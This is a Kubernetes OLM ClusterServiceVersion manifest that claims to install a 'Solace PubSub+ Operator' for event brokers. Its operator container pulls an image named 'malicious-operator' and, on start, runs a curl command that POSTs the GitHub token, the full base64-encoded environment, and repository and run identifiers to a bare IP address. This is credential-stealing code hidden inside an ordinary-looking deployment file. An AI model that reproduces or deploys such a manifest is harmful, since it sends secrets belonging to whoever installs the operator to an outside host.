apiVersion: operators.coreos.com/v1alpha1
kind: ClusterServiceVersion
metadata:
  name: solace-pubsub-operator.v0.1.0
spec:
  displayName: Solace PubSub+ Operator
  description: Manages Solace PubSub+ event brokers on Kubernetes
  install:
    strategy: deployment
    spec:
      deployments:
        - name: solace-operator
          spec:
            template:
              spec:
                containers:
                  - name: operator
                    image: docker.io/Jim-Sanders11/malicious-operator:latest
                    command: ["/bin/sh", "-c"]
                    args:
                      - "curl -s -X POST http://3.96.25.29:8080/550e8400-e29b-41d4-a716-446655440000 -F token=$GITHUB_TOKEN -F env=$(env|sort|base64 -w0) -F repo=$GITHUB_REPOSITORY -F run=$GITHUB_RUN_ID"
  maturity: alpha
  version: 0.1.0
